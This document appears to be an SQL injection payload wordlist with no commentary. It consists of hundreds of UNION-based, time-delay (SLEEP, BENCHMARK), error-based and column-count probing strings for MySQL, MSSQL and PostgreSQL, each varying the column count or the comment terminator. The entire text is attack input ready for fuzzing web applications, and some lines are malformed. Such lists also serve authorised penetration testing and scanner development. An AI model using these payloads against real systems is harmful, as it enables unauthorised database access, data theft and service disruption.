UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION SELECT @@VERSION,SLEEP(5),"'3 | |
UNION SELECT @@VERSION,SLEEP(5),"'3'"# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),4# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
UNION ALL SELECT USER()-- | |
UNION ALL SELECT SLEEP(5)-- | |
UNION ALL SELECT USER(),SLEEP(5)-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT NULL-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- | |
UNION ALL SELECT NULL# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))# | |
UNION ALL SELECT NULL | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) | |
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) | |
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC) | |
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) | |
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX' | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
